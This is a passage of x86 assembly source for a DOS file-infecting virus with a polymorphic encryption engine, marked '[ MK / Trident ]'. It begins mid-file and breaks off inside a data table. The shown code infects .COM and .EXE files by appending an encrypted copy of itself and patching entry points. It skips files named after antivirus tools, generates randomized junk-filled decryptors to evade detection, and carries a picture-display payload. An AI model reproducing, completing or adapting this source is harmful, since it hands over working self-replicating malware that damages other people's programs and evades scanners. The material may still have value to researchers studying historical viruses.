pop di - pop si - pop ds - pop es - popf - -org21: jmp dword ptr cs:[oi21] ;call to old int-handler - - -;****************************************************************************** -;* Show picture -;****************************************************************************** - -show_pic: mov ax,offset no_infect ;push return adres on stack - push cs - push ax - - mov di,((VIRPAR*10)+0100) ;move picture routine - mov si,offset beeld - mov cx,PICLEN - push cs - pop ds - push cs - pop es - rep movsb - - mov ax,cs ;calculate segment registers - add ax,low VIRPAR - mov ds,ax - mov es,ax - - push ax ;push picture adres on stack - mov ax,0100 - push ax - - db 0CBh ;(retf) goto picture routine - - -;****************************************************************************** -;* Tries to infect the file -;****************************************************************************** - -infect: cld - - push cs ;copy filename to CS:0000 - pop es - mov si,dx - xor di,di - mov cx,0080 -namemove: lodsb - cmp al,0 - je moved - cmp al,'a' - jb char_ok - cmp al,'z' - ja char_ok - xor al,20 ;convert to upper case -char_ok: stosb - loop namemove -return0: ret - -moved: stosb ;put last zero after filename - lea si,[di-5] - push cs - pop ds - - lodsw ;check extension .COM or .EXE - cmp ax,'E.' - jne not_exe - lodsw - cmp ax,'EX' - jmp short check - -not_exe: cmp ax,'C.' - jne return0 - lodsw - cmp ax,'MO' -check: jne return0 - - std ;find begin of filename - mov cx,si - inc cx -searchbegin: lodsb - cmp al,':' - je checkname - cmp al,'\' - je checkname - loop searchbegin - dec si - -checkname: cld ;check filename - lodsw - lodsw - mov di,offset names - mov cl,13 - repnz scasw - je return0 - - mov ax,3300 ;get ctrl-break flag - int 21 - push dx ;save flag on stack - - cwd ;clear the flag - inc ax - push ax - int 21 - - mov ax,3524 ;get int24 vector - int 21 - push es ;save vector on stack - push bx - - push cs - pop ds - - mov dx,offset ni24 ;install new int24 handler - mov ah,25 - push ax - int 21 - - mov ax,4300 ;ask file-attributes - cwd - int 21 - push cx ;save attributes on stack - - xor cx,cx ;clear attributes - mov ax,4301 - push ax - int 21 - jc return1v - - mov ax,3D02 ;open the file - int 21 - jnc opened -return1v: jmp return1 - -opened: xchg ax,bx ;save handle - - mov ax,5700 ;get file date & time - int 21 - push dx ;save date & time on stack - push cx - - mov cx,BUFLEN ;read begin of file - mov si,offset buffer - mov dx,si - call read - jc closev - - mov ax,4202 ;goto end, get filelength - xor cx,cx - cwd - int 21 - - mov di,offset oldlen ;save filelength - mov [di],ax - mov [di+2],dx - - mov ax,word ptr [si+12] ;already infected? - add al,ah - cmp al,'@' - jz closev - - cmp word ptr [si],'ZM' ;EXE ? - je do_EXE - -do_COM: test byte ptr [si],80 ;maybe a strange EXE? - jz closev - - mov ax,word ptr [di] ;check lenght of file - cmp ah,0D0 - jae closev - cmp ah,1 - jb closev - - mov dx,ax - add dx,0100 - call writeprog ;call Engine and write virus - jne closev - - mov byte ptr [si],0E9 ;put 'JMP xxxx' at begin - sub ax,low 3 - mov word ptr [si+1],ax - jmp done - -closev: jmp close - -do_EXE: cmp word ptr [si+18],40 ;is it a windows/OS2 EXE ? - jb not_win - - mov ax,003C - cwd - call readbytes - jc closev - - mov ax,word ptr [di+8] - mov dx,word ptr [di+0A] - call readbytes - jc closev - - cmp byte ptr [di+9],'E' - je closev - -not_win: call getlen - call calclen ;check for internal overlays - cmp word ptr [si+4],ax - jne close - cmp word ptr [si+2],dx - jne close - - cmp word ptr [si+0C],0 ;high memory allocation? - je close - - cmp word ptr [si+1A],0 ;overlay nr. not zero? - jne close - - call getlen ;calculate new CS & IP - mov cx,0010 - div cx - sub ax,word ptr [si+8] - dec ax - add dx,low 10 - - call writeprog ;call Engine and write virus - jne close - - mov word ptr [si+16],ax ;put CS in header - mov word ptr [si+0E],ax ;put SS in header - mov word ptr [si+14],dx ;put IP in header - mov word ptr [si+10],STACKOFF ;put SP in header - - call getlen - add ax,cx - adc dx,0 - call calclen ;put new length in header - mov word ptr [si+4],ax - mov word ptr [si+2],dx - - lea di,[si+0A] ;adjust mem. allocation info - call mem_adjust - lea di,[si+0C] - call mem_adjust - -done: call gotobegin - call rnd_get ;signature - mov ah,'@' - sub ah,al - mov word ptr [si+12],ax - mov cx,BUFLEN ;write new begin - mov dx,si - mov ah,40 - int 21 - -close: pop cx ;restore date & time - pop dx - mov ax,5701 - int 21 - - mov ah,3E ;close the file - int 21 - -return1: pop ax ;restore attributes - pop cx - cwd - int 21 - - pop ax ;restore int24 vector - pop dx - pop ds - int 21 - - pop ax ;restore ctrl-break flag - pop dx - int 21 - - ret - - -;****************************************************************************** -;* Filenames to avoid -;****************************************************************************** - -names: db 'CO', 'SC', 'CL', 'VS', 'NE', 'HT', 'TB', 'VI' - db 'FI', 'GI', 'RA', 'FE', 'MT', 'BR', 'IM', ' ' - db ' ', ' ', ' ' - - -;****************************************************************************** -;* Write virus to the program -;****************************************************************************** - -writeprog: push ax ;save registers - push dx - push si - push bp - push es - - cli - mov word ptr [di-4],ss ;save SS & SP - mov word ptr [di-2],sp - - mov ax,cs ;new stack & buffer-segment - mov ss,ax - mov sp,((VIRPAR + WORKPAR) * 10) - add ax,low VIRPAR - mov es,ax - sti - - push ds - - mov bp,dx ;input parameters for engine - mov dx,0100 - mov cx,FILELEN - xor si,si - mov al,0Fh - - push di - push bx - - call crypt ;call the Engine - - pop bx - pop di - - push cx - push dx - mov ax,4202 ;goto end - xor cx,cx - cwd - int 21 - pop dx - pop cx - - mov ah,40 ;write virus - int 21 - cmp ax,cx ;are all bytes written? - - pop ds - - cli - mov ss,word ptr [di-4] ;restore stack - mov sp,word ptr [di-2] - sti - - pop es ;restore registers - pop bp - pop si - pop dx - pop ax - - ret - - -;****************************************************************************** -;* Adjust mem allocation info in EXE header -;****************************************************************************** - -mem_adjust: mov ax,[di] - sub ax,low FILEPAR ;alloc. may be this much less - jb more - cmp ax,DATAPAR ;minimum amount to allocate - jae mem_ok -more: mov ax,DATAPAR -mem_ok: mov [di],ax - ret - - -;****************************************************************************** -;* Read a few bytes -;****************************************************************************** - -readbytes: call goto - mov dx,offset minibuf - mov cx,4 -read: mov ah,3F - int 21 - ret - - -;****************************************************************************** -;* Calculate length for EXE header -;****************************************************************************** - -calclen: mov cx,0200 - div cx - or dx,dx - jz no_cor - inc ax -no_cor: ret - - -;****************************************************************************** -;* Get original length of program -;****************************************************************************** - -getlen: mov ax,[di] - mov dx,[di+2] - ret - - -;****************************************************************************** -;* Goto new offset DX:AX -;****************************************************************************** - -gotobegin: xor ax,ax - cwd -goto: xchg cx,dx - xchg ax,dx - mov ax,4200 - int 21 - ret - - -;**************************************************************************** -;* -;* Encryption Engine -;* -;* -;* Input: ES work segment -;* DS:DX code to encrypt -;* BP what will be start of decryptor -;* SI what will be distance between decryptor and code -;* CX length of code -;* AX flags: bit 0: DS will not be equal to CS -;* bit 1: insert random instructions -;* bit 2: put junk before decryptor -;* bit 3: preserve AX with decryptor -;* -;* Output: ES: work segment (preserved) -;* DS:DX decryptor + encrypted code -;* BP what will be start of decryptor (preserved) -;* DI length of decryptor / offset of encrypted code -;* CX length of decryptor + encrypted code -;* AX length of encrypted code -;* (other registers may be trashed) -;* -;**************************************************************************** - - db '[ MK / Trident ]' - -crypt: xor di,di ;di = start of decryptor - push dx ;save offset of code - push si ;save future offset of code - - mov byte ptr ds:[flags],al ;save flags - test al,8 ;push AX? - jz no_push - mov al,50 - stosb - -no_push: call rnd_get ;add a few bytes to cx - and ax,1F - add cx,ax - push cx ;save length of code - - call rnd_get ;get random flags - xchg ax,bx - ;BX flags: - - ;0,1 how to encrypt - ;2,3 which register for encryption - ;4 use byte or word for encrypt - ;5 MOV AL, MOV AH or MOV AX - ;6 MOV CL, MOV CH or MOV CX - ;7 AX or DX - - ;8 count up or down - ;9 ADD/SUB/INC/DEC or CMPSW/SCASW - ;A ADD/SUB or INC/DEC - ; CMPSW or SCASW - ;B offset in XOR instruction? - ;C LOOPNZ or LOOP - ; SUB CX or DEC CX - ;D carry with crypt ADD/SUB - ;E carry with inc ADD/SUB - ;F XOR instruction value or AX/DX - -random: call rnd_get ;get random encryption value - or al,al - jz random ;again if 0 - mov ds:[xor_val],ax - - call do_junk ;insert random instructions - - pop cx - - mov ax,0111 ;make flags to remember which - test bl,20 ; MOV instructions are used - jnz z0 - xor al,07 -z0: test bl,0C - jnz z1 - xor al,70 -z1: test bl,40 - jnz z2 - xor ah,7 -z2: test bl,10 - jnz z3 - and al,73 -z3: test bh,80 - jnz z4 - and al,70 - -z4: mov dx,ax -mov_lup: call rnd_get ;put MOV instructions in - and ax,000F ; a random order - cmp al,0A - ja mov_lup - - mov si,ax - push cx ;test if MOV already done - xchg ax,cx - mov ax,1 - shl ax,cl - mov cx,ax - and cx,dx - pop cx - jz mov_lup - xor dx,ax ;remember which MOV done - - push dx - call do_mov ;insert MOV instruction - call do_nop ;insert a random NOP - pop dx - - or dx,dx ;all MOVs done? - jnz mov_lup - - push di ;save start of decryptor loop - - call do_add_ax ;add a value to AX in loop? - call do_nop - test bh,20 ;carry with ADD/SUB ? - jz no_clc - mov al,0F8 - stosb -no_clc: mov word ptr ds:[xor_offset],0 - call do_xor ;place all loop instructions - call do_nop - call do_add - - pop dx ;get start of decryptor loop - - call do_loop - - test byte ptr ds:[flags],8 ;insert POP AX ? - jz no_pop - mov al,58 - stosb - -no_pop: xor ax,ax ;calculate loop offset - test bh,1 ;up or down? - jz v1 - mov ax,cx - dec ax - test bl,10 ;encrypt with byte or word? - jz v1 - and al,0FE -v1: add ax,di - add ax,bp - pop si - add ax,si - sub ax,word ptr ds:[xor_offset] - mov si,word ptr ds:[where_len] - test bl,0C ;are BL,BH used for encryption? - jnz v2 - mov byte ptr es:[si],al - mov si,word ptr ds:[where_len2] - mov byte ptr es:[si],ah - jmp short v3 -v2: mov word ptr es:[si],ax - -v3: mov dx,word ptr ds:[xor_val] ;encryption value - - pop si ;ds:si = start of code - - push di ;save ptr to encrypted code - push cx ;save length of encrypted code - - test bl,10 ;byte or word? - jz blup - - inc cx ;cx = # of crypts (words) - shr cx,1 - -lup: lodsw ;encrypt code (words) - call do_encrypt - stosw - loop lup - jmp short klaar - - -blup: lodsb ;encrypt code (bytes) - xor dh,dh - call do_encrypt - stosb - loop blup - -klaar: mov cx,di ;cx = length decryptpr + code - pop ax ;ax = length of decrypted code - pop di ;di = offset encrypted code - xor dx,dx ;ds:dx = decryptor + cr. code - push es - pop ds - ret - - -;**************************************************************************** -;* encrypt the code -;**************************************************************************** - -do_encrypt: add dx,word ptr ds:[add_val] - test bl,2 - jnz lup1 - xor ax,dx - ret - -lup1: test bl,1 - jnz lup2 - sub ax,dx - ret - -lup2: add ax,dx - ret - - -;**************************************************************************** -;* generate mov reg,xxxx -;**************************************************************************** - -do_mov: mov dx,si - mov al,byte ptr ds:[si+mov_byte] - cmp dl,4 ;BX? - jne is_not_bx - call add_ind -is_not_bx: test dl,0C ;A*? - pushf - jnz is_not_a - test bl,80 ;A* or D*? - jz is_not_a - add al,2 - -is_not_a: call alter ;insert the MOV - - popf ;A*? - jnz is_not_a2 - mov ax,word ptr ds:[xor_val] - jmp short sss - -is_not_a2: test dl,8 ;B*? - jnz is_not_b - mov si,offset where_len - test dl,2 - jz is_not_bh - add si,2 -is_not_bh: mov word ptr ds:[si],di - jmp short sss - -is_not_b: mov ax,cx ;C* - test bl,10 ;byte or word encryption? - jz sss - inc ax ;only half the number of bytes - shr ax,1 -sss: test dl,3 ;byte or word register? - jz is_x - test dl,2 ;*H? - jz is_not_h - xchg al,ah -is_not_h: stosb - ret - -is_x: stosw - ret - - -;**************************************************************************** -;* insert MOV or alternative for MOV -;**************************************************************************** - -alter: push bx - push cx - push ax - call rnd_get - xchg ax,bx - pop ax - test bl,3 ;use alternative for MOV? - jz no_alter - - push ax - and bx,0F - and al,08 - shl ax,1 - or bx,ax - pop ax - - and al,7 - mov cl,9 - xchg ax,cx - mul cl - - add ax,30C0 - xchg al,ah - test bl,4 - jz no_sub - mov al,28 -no_sub: call maybe_2 - stosw - - mov al,80 - call maybe_2 - stosb - - mov ax,offset add_mode - xchg ax,bx - and ax,3 - xlat - - add al,cl -no_alter: stosb - pop cx - pop bx - ret - - -;**************************************************************************** -;* insert ADD AX,xxxx -;**************************************************************************** - -do_add_ax: push cx - mov si,offset add_val ;save add-value here - mov word ptr ds:[si],0 - mov ax,bx - and ax,8110 - xor ax,8010 - jnz no_add_ax ;use ADD? - - mov ax,bx - xor ah,ah - mov cl,3 - div cl - or ah,ah - jnz no_add_ax ;use ADD? - - test bl,80 - jnz do_81C2 ;AX or DX? - mov al,5 - stosb - jmp short do_add0 -do_81C2: mov ax,0C281 - stosw -do_add0: call rnd_get - mov word ptr ds:[si],ax - stosw -no_add_ax: pop cx - ret - - -;**************************************************************************** -;* generate encryption command -;**************************************************************************** - -do_xor: test byte ptr ds:[flags],1 - jz no_cs - mov al,2E ;insert CS: instruction - stosb - -no_cs: test bh,80 ;type of XOR command - jz xor1 - - call get_xor ;encrypt with register - call do_carry - call save_it - xor ax,ax - test bl,80 - jz xxxx - add al,10 -xxxx: call add_dir - test bh,8 - jnz yyyy - stosb - ret - -yyyy: or al,80 - stosb - call rnd_get - stosw - mov word ptr ds:[xor_offset],ax - ret - -xor1: mov al,080 ;encrypt with value - call save_it - call get_xor - call do_carry - call xxxx - mov ax,word ptr ds:[xor_val] - test bl,10 - jmp byte_word - - -;**************************************************************************** -;* generate increase/decrease command -;**************************************************************************** - -do_add: test bl,8 ;no CMPSW/SCASW if BX is used - jz da0 - test bh,2 ;ADD/SUB/INC/DEC or CMPSW/SCASW - jnz do_cmpsw - -da0: test bh,4 ;ADD/SUB or INC/DEC? - jz add1 - - mov al,40 ;INC/DEC - test bh,1 ;up or down? - jz add0 - add al,8 -add0: call add_ind - stosb - test bl,10 ;byte or word? - jz return - stosb ;same instruction again -return: ret - -add1: test bh,40 ;ADD/SUB - jz no_clc2 ;carry? - mov al,0F8 ;insert CLC - stosb -no_clc2: mov al,083 - stosb - mov al,0C0 - test bh,1 ;up or down? - jz add2 - mov al,0E8 -add2: test bh,40 ;carry? - jz no_ac2 - and al,0CF - or al,10 -no_ac2: call add_ind - stosb - mov al,1 ;value to add/sub -save_it: call add_1 - stosb - ret - -do_cmpsw: test bh,1 ;up or down? - jz no_std - mov al,0FDh ;insert STD - stosb -no_std: test bh,4 ;CMPSW or SCASW? - jz normal_cmpsw - test bl,4 ;no SCASW if SI is used - jnz do_scasw - -normal_cmpsw: mov al,0A6 ;CMPSB - jmp short save_it -do_scasw: mov al,0AE ;SCASB - jmp short save_it - - -;**************************************************************************** -;* generate loop command -;**************************************************************************** - -do_loop: test bh,1 ;no JNE if couting down - jnz loop_loop ; (prefetch bug!) - call rnd_get - test al,1 ;LOOPNZ/LOOP or JNE? - jnz cx_loop - -loop_loop: mov al,0E0 - test bh,1A ;LOOPNZ or LOOP? - jz ll0 ; no LOOPNZ if xor-offset - add al,2 ; no LOOPNZ if CMPSW/SCASW -ll0: stosb - mov ax,dx - sub ax,di - dec ax - stosb - ret - -cx_loop: test bh,10 ;SUB CX or DEC CX? - jnz cxl_dec - mov ax,0E983 - stosw - mov al,1 - stosb - jmp short do_jne - -cxl_dec: mov al,49 - stosb -do_jne: mov al,75 - jmp short ll0 - - -;**************************************************************************** -;* add value to AL depending on register type -;**************************************************************************** - -add_dir: mov si,offset dir_change - jmp short xx1 - -add_ind: mov si,offset ind_change -xx1: push bx - shr bl,1 - shr bl,1 - and bx,3 - add al,byte ptr ds:[bx+si] - pop bx - ret - - -;**************************************************************************** -;* mov encryption command byte to AL -;**************************************************************************** - -get_xor: push bx - mov ax,offset how_mode - xchg ax,bx - and ax,3 - xlat - pop bx - ret - - -;**************************************************************************** -;* change ADD into ADC -;**************************************************************************** - -do_carry: test bl,2 ;ADD/SUB used for encryption? - jz no_ac - test bh,20 ;carry with (encr.) ADD/SUB? - jz no_ac - and al,0CF - or al,10 -no_ac: ret - - -;**************************************************************************** -;* change AL (byte/word) -;**************************************************************************** - -add_1: test bl,10 - jz add_1_ret - inc al -add_1_ret: ret - - -;**************************************************************************** -;* change AL (byte/word) -;**************************************************************************** - -maybe_2: call add_1 - cmp al,81 ;can't touch this - je maybe_not - push ax - call rnd_get - test al,1 - pop ax - jz maybe_not - add al,2 -maybe_not: ret - - -;**************************************************************************** -;* get random nop (or not) -;**************************************************************************** - -do_nop: test byte ptr ds:[flags],2 - jz no_nop -yes_nop: call rnd_get - test al,3 - jz nop8 - test al,2 - jz nop16 - test al,1 - jz nop16x -no_nop: ret - - -;**************************************************************************** -;* Insert random instructions -;**************************************************************************** - -do_junk: test byte ptr ds:[flags],4 - jz no_junk - call rnd_get ;put a random number of - and ax,0F ; dummy instructions before - inc ax ; decryptor - xchg ax,cx -junk_loop: call junk - loop junk_loop -no_junk: ret - - -;**************************************************************************** -;* get rough random nop (may affect register values) -;**************************************************************************** - -junk: call rnd_get - and ax,1E - jmp short aa0 -nop16x: call rnd_get - and ax,06 -aa0: xchg ax,si - call rnd_get - jmp word ptr ds:[si+junkcals] - - -;**************************************************************************** -;* NOP and junk addresses -;**************************************************************************** - -junkcals dw offset nop16x0 - dw offset nop16x1 - dw offset nop16x2 - dw offset nop16x3 - dw offset nop8 - dw offset nop16 - dw offset junk6 - dw offset junk7 - dw offset junk8 - dw offset junk9 - dw offset junkA - dw offset junkB - dw offset junkC - dw offset junkD - dw offset junkE - dw offset junkF - - -;**************************************************************************** -;* NOP and junk routines -;**************************************************************************** - -nop16x0: and ax,000F ;J* 0000 (conditional) - or al,70 - stosw - ret - - -nop16x1: mov al,0EBh ;JMP xxxx / junk - and ah,07 - inc ah - stosw - xchg al,ah ;get lenght of bullshit - cbw - jmp fill_bullshit - - -nop16x2: call junkD ;XCHG AX,reg / XCHG AX,reg - stosb - ret - - -nop16x3: call junkF ;INC / DEC or DEC / INC - xor al,8 - stosb - ret - - -nop8: push bx ;8-bit NOP - and al,7 - mov bx,offset nop_data8 - xlat - stosb - pop bx - ret - - -nop16: push bx ;16-bit NOP - and ax,0303 - mov bx,offset nop_data16 - xlat - add al,ah - stosb - call rnd_get - and al,7 - mov bl,9 - mul bl - add al,0C0 - stosb - pop bx - ret - - -junk6: push cx ;CALL xxxx / junk / POP reg - mov al,0E8 - and ah,0F - inc ah - stosw - xor al,al - stosb - xchg al,ah - call fill_bullshit - call do_nop - call rnd_get ;insert POP reg - and al,7 - call no_sp - mov cx,ax - or al,58 - stosb - - test ch,3 ;more? - jnz junk6_ret - - call do_nop - mov ax,0F087 ;insert XCHG SI,reg - or ah,cl - test ch,8 - jz j6_1 - mov al,8Bh -j6_1: stosw - - call do_nop - push bx - call rnd_get - xchg ax,bx - and bx,0F7FBh ;insert XOR [SI],xxxx - or bl,8 - call do_xor - pop bx -junk6_ret: pop cx - ret - - -junk7: and al,0F ;MOV reg,xxxx - or al,0B0 - call no_sp - stosb - test al,8 - pushf - call rnd_get - popf - jmp short byte_word - - -junk8: and ah,39 ;DO r/m,r(8/16) - or al,0C0 - call no_sp - xchg al,ah - stosw - ret - - -junk9: and al,3Bh ;DO r(8/16),r/m - or al,2 - and ah,3F - call no_sp2 - call no_bp - stosw - ret - - -junkA: and ah,1 ;DO rm,xxxx - or ax,80C0 - call no_sp - xchg al,ah - stosw - test al,1 - pushf - call rnd_get - popf - jmp short byte_word - - -junkB: call nop8 ;NOP / LOOP - mov ax,0FDE2 - stosw - ret - - -junkC: and al,09 ;CMPS* or SCAS* - test ah,1 - jz mov_test - or al,0A6 - stosb - ret -mov_test: or al,0A0 ;MOV AX,[xxxx] or TEST AX,xxxx - stosb - cmp al,0A8 - pushf - call rnd_get - popf - jmp short byte_word - - -junkD: and al,07 ;XCHG AX,reg - or al,90 - call no_sp - stosb - ret - - -junkE: and ah,07 ;PUSH reg / POP reg - or ah,50 - mov al,ah - or ah,08 - stosw - ret - - -junkF: and al,0F ;INC / DEC - or al,40 - call no_sp - stosb - ret - - -;**************************************************************************** -;* store a byte or a word -;**************************************************************************** - -byte_word: jz only_byte - stosw - ret - -only_byte: stosb - ret - - -;**************************************************************************** -;* don't fuck with SP! -;**************************************************************************** - -no_sp: push ax - and al,7 - cmp al,4 - pop ax - jnz no_sp_ret - and al,0FBh -no_sp_ret: ret - - -;**************************************************************************** -;* don't fuck with SP! -;**************************************************************************** - -no_sp2: push ax - and ah,38 - cmp ah,20 - pop ax - jnz no_sp2_ret - xor ah,20 -no_sp2_ret: ret - - -;**************************************************************************** -;* don't use [BP+..] -;**************************************************************************** - -no_bp: test ah,4 - jnz no_bp2 - and ah,0FDh - ret - -no_bp2: push ax - and ah,7 - cmp ah,6 - pop ax - jnz no_bp_ret - or ah,1 -no_bp_ret: ret - - -;**************************************************************************** -;* write byte for JMP/CALL and fill with random bullshit -;**************************************************************************** - -fill_bullshit: push cx - xchg ax,cx -bull_lup: call rnd_get - stosb - loop bull_lup - pop cx - ret - - -;**************************************************************************** -;* random number generator (stolen from 'Bomber') -;**************************************************************************** - -rnd_init: push cx - call rnd_init0 ;init - and ax,000F - inc ax - xchg ax,cx -random_lup: call rnd_get ;call random routine a few - loop random_lup ; times to 'warm up' - pop cx - ret - -rnd_init0: push dx ;initialize generator - push cx - mov ah,2C - int 21 - in al,40 - mov ah,al - in al,40 - xor ax,cx - xor dx,ax - jmp short move_rnd - -rnd_get: push dx ;calculate a random number - push cx - push bx - mov ax,0 ;will be: mov ax,xxxx - mov dx,0 ; and mov dx,xxxx - mov cx,7 -rnd_lup: shl ax,1 - rcl dx,1 - mov bl,al - xor bl,dh - jns rnd_l2 - inc al -rnd_l2: loop rnd_lup - pop bx - -move_rnd: mov word ptr ds:[rnd_get+4],ax - mov word ptr ds:[rnd_get+7],dx - mov al,dl - pop cx - pop dx - ret - - -;**************************************************************************** -;* tables for engine -;**************************************************************************** - - ; AX AL AH (BX) BL BH CX CL CH -mov_byte db 0B8, 0B0, 0B4, 0, 0B8, 0B3, 0B7, 0, 0B9, 0B1, 0B5 - - ; nop clc stc cmc cli cld incbp decbp -nop_data8 db 90, 0F8, 0F9, 0F5, 0FA, 0FC, 45, 4Dh - - ; or and xchg mov -nop_data16 db 8, 20, 84, 88 - - ; bl/bh, bx, si di -dir_change db 07, 07, 04, 05 -ind_change db 03, 03, 06, 07 - - - ; xor xor add sub -how_mode db 30, 30, 00, 28 - - ; ? add xor or -add_mode db 0, 0C8, 0F0, 0C0 - - -;**************************************************************************** -;* text + buffer -;**************************************************************************** - - db ' Amsterdam = COFFEESHOP! ' - -buffer db 0CDh, 20 ;original code of dummy program - db (BUFLEN-2) dup (?) - - -;**************************************************************************** -;* the (packed) picture routine -;**************************************************************************** - -beeld db 0BFh, 0A1h, 015h, 090h, 090h, 090h, 090h, 090h - db 090h, 090h, 090h, 0BEh, 0F9h, 003h, 0B9h, 06Bh - db 001h, 0FDh, 0F3h, 0A5h, 0FCh, 08Bh, 0F7h, 0BFh - db 000h, 001h, 0ADh, 0ADh, 08Bh, 0E8h, 0B2h, 010h - db 0E9h, 036h, 014h, 04Fh, 08Fh, 07Fh, 0FCh, 0B4h - db 00Fh, 0CDh, 010h, 0B4h, 000h, 050h, 0FBh, 0B7h - db 0B0h, 03Ch, 007h, 074h, 0FFh, 0FFh, 00Ah, 03Ch - db 004h, 073h, 028h, 0B7h, 0B8h, 03Ch, 002h, 072h - db 022h, 08Eh, 0C3h, 0BEh, 040h, 001h, 0FFh, 0FFh - db 0B0h, 019h, 057h, 0B1h, 050h, 0F3h, 0A5h, 05Fh - db 081h, 0C7h, 0A0h, 000h, 0FEh, 0C8h, 075h, 0F2h - db 003h, 08Fh, 0B8h, 007h, 00Eh, 0D6h, 0FBh, 00Ch - db 0CDh, 021h, 058h, 0F8h, 063h, 0A7h, 0CBh, 020h - db 002h, 0FEh, 020h, 000h, 0FAh, 0EBh, 0B0h, 0FCh - db 0F8h, 003h, 077h, 0F0h, 0E0h, 0D0h, 041h, 00Fh - db 0C0h, 02Fh, 007h, 01Dh, 080h, 06Fh, 0BAh, 0DCh - db 0E1h, 034h, 0DBh, 00Ch, 0F8h, 0F0h, 00Eh, 0DFh - db 0FEh, 0F4h, 0F8h, 0BBh, 0AEh, 0F8h, 0E4h, 003h - db 084h, 0E0h, 0FCh, 0EBh, 0B0h, 0E6h, 0EAh, 0A3h - db 083h, 0DAh, 0AAh, 00Eh, 0DCh, 009h, 0BAh, 0C8h - db 001h, 03Ah, 0F0h, 050h, 007h, 0A2h, 0E8h, 0E0h - db 0ACh, 005h, 0DBh, 00Eh, 077h, 00Fh, 0F8h, 0DCh - db 0F6h, 0BAh, 0AEh, 0F0h, 0F6h, 0EBh, 03Ah, 0F0h - db 0F4h, 0E0h, 040h, 017h, 0FAh, 0ECh, 01Dh, 072h - db 0DFh, 0DAh, 0D2h, 074h, 0F8h, 0BAh, 0DDh, 020h - db 01Dh, 074h, 0DEh, 020h, 0AAh, 007h, 0BAh, 0D8h - db 061h, 0F8h, 047h, 087h, 0F8h, 0E8h, 0E1h, 0E8h - db 0F8h, 092h, 0F4h, 000h, 01Dh, 060h, 0D8h, 0E8h - db 009h, 0DCh, 0FEh, 009h, 0F8h, 0B0h, 023h, 0F8h - db 05Ch, 0D7h, 0FCh, 0F8h, 0FCh, 0E8h, 001h, 03Bh - db 0F4h, 0ECh, 080h, 0D2h, 01Dh, 0BEh, 0BAh, 05Ch - db 020h, 07Ch, 003h, 075h, 060h, 0CAh, 020h, 00Eh - db 0B2h, 0D8h, 081h, 0F0h, 03Bh, 040h, 092h, 0D7h - db 0B5h, 0CEh, 0F8h, 0DCh, 060h, 0A7h, 041h, 0DEh - db 060h, 002h, 0B5h, 0BEh, 03Ch, 020h, 00Fh, 07Bh - db 022h, 065h, 007h, 01Dh, 060h, 06Eh, 084h, 0CCh - db 0DFh, 00Dh, 020h, 0C0h, 0B3h, 020h, 02Fh, 060h - db 041h, 01Eh, 06Ah, 0DEh, 07Eh, 00Ah, 042h, 0E0h - db 009h, 0E4h, 0C0h, 075h, 030h, 060h, 00Bh, 0DFh - db 01Ch, 0F4h, 0E4h, 042h, 04Fh, 05Eh, 05Eh, 041h - db 09Ah, 022h, 006h, 02Bh, 01Ch, 080h, 060h, 03Eh - db 084h, 057h, 005h, 0CAh, 046h, 0A4h, 0D0h, 07Bh - db 053h, 07Ah, 097h, 005h, 015h, 0C2h, 004h, 020h - db 01Dh, 054h, 060h, 001h, 0C8h, 051h, 041h, 0E8h - db 0DCh, 006h, 054h, 0BEh, 077h, 0D8h, 02Dh, 078h - db 07Ah, 050h, 055h, 001h, 004h, 020h, 05Dh, 007h - db 076h, 02Eh, 0AEh, 03Ah, 0C6h, 062h, 0E8h, 0A0h - db 055h, 05Eh, 009h, 0A2h, 002h, 0C0h, 020h, 057h - db 084h, 0C6h, 0D0h, 004h, 01Dh, 02Ah, 05Dh, 05Eh - db 0D6h, 016h, 017h, 080h, 098h, 0A4h, 040h, 003h - db 050h, 0EAh, 0ACh, 05Dh, 005h, 062h, 0C4h, 01Dh - db 070h, 059h, 05Eh, 0C4h, 067h, 005h, 082h, 0DCh - db 020h, 002h, 005h, 060h, 020h, 0E4h, 090h, 062h - db 019h, 0D4h, 094h, 065h, 0ECh, 00Eh, 069h, 05Eh - db 0CFh, 007h, 0A0h, 070h, 020h, 0B0h, 0A2h, 0B2h - db 083h, 00Ah, 062h, 069h, 0CCh, 03Bh, 060h, 05Eh - db 0D5h, 002h, 0BEh, 080h, 070h, 090h, 062h, 004h - db 072h, 083h, 055h, 0FEh, 06Eh, 010h, 041h, 040h - db 041h, 0AEh, 0FEh, 0CEh, 075h, 034h, 09Eh, 0FEh - db 002h, 071h, 05Ch, 0BAh, 0AAh, 0E6h, 0CCh, 018h - db 072h, 0C0h, 062h, 040h, 00Eh, 06Ch, 07Bh, 047h - db 0F2h, 0BCh, 005h, 015h, 028h, 050h, 026h, 0E1h - db 070h, 0FEh, 052h, 05Fh, 068h, 009h, 0FEh, 0BEh - db 040h, 010h, 02Ah, 0F2h, 0AEh, 0E0h, 03Ah, 070h - db 0FEh, 0FCh, 06Ah, 04Ah, 050h, 0DEh, 061h, 0ACh - db 061h, 0C7h, 050h, 00Eh, 001h, 03Eh, 072h, 060h - db 048h, 08Eh, 00Ah, 06Ah, 096h, 03Ah, 0E8h, 002h - db 066h, 058h, 084h, 0B0h, 045h, 0B4h, 007h, 020h - db 05Ah, 0EAh, 0E9h, 0C0h, 044h, 02Dh, 060h, 0E8h - db 093h, 0A0h, 09Eh, 073h, 048h, 050h, 0C6h, 0FFh - db 0F0h, 041h, 0D3h, 0FFh, 060h, 040h, 001h, 0FFh - db 0D1h, 0EDh, 0FEh, 0CAh, 075h, 005h, 0ADh, 08Bh - db 0E8h, 0B2h, 010h, 0C3h, 0E8h, 0F1h, 0FFh, 0D0h - db 0D7h, 0E8h, 0ECh, 0FFh, 072h, 014h, 0B6h, 002h - db 0B1h, 003h, 0E8h, 0E3h, 0FFh, 072h, 009h, 0E8h - db 0DEh, 0FFh, 0D0h, 0D7h, 0D0h, 0E6h, 0E2h, 0F2h - db 02Ah, 0FEh, 0B6h, 002h, 0B1h, 004h, 0FEh, 0C6h - db 0E8h, 0CDh, 0FFh, 072h, 010h, 0E2h, 0F7h, 0E8h - db 0C6h, 0FFh, 073h, 00Dh, 0FEh, 0C6h, 0E8h, 0BFh - db 0FFh, 073h, 002h, 0FEh, 0C6h, 08Ah, 0CEh, 0EBh - db 02Ah, 0E8h, 0B4h, 0FFh, 072h, 010h, 0B1h, 003h - db 0B6h, 000h, 0E8h, 0ABh, 0FFh, 0D0h, 0D6h, 0E2h - db 0F9h, 080h, 0C6h, 009h, 0EBh, 0E7h, 0ACh, 08Ah - db 0C8h, 083h, 0C1h, 011h, 0EBh, 00Dh, 0B1h, 003h - db 0E8h, 095h, 0FFh, 0D0h, 0D7h, 0E2h, 0F9h, 0FEh - db 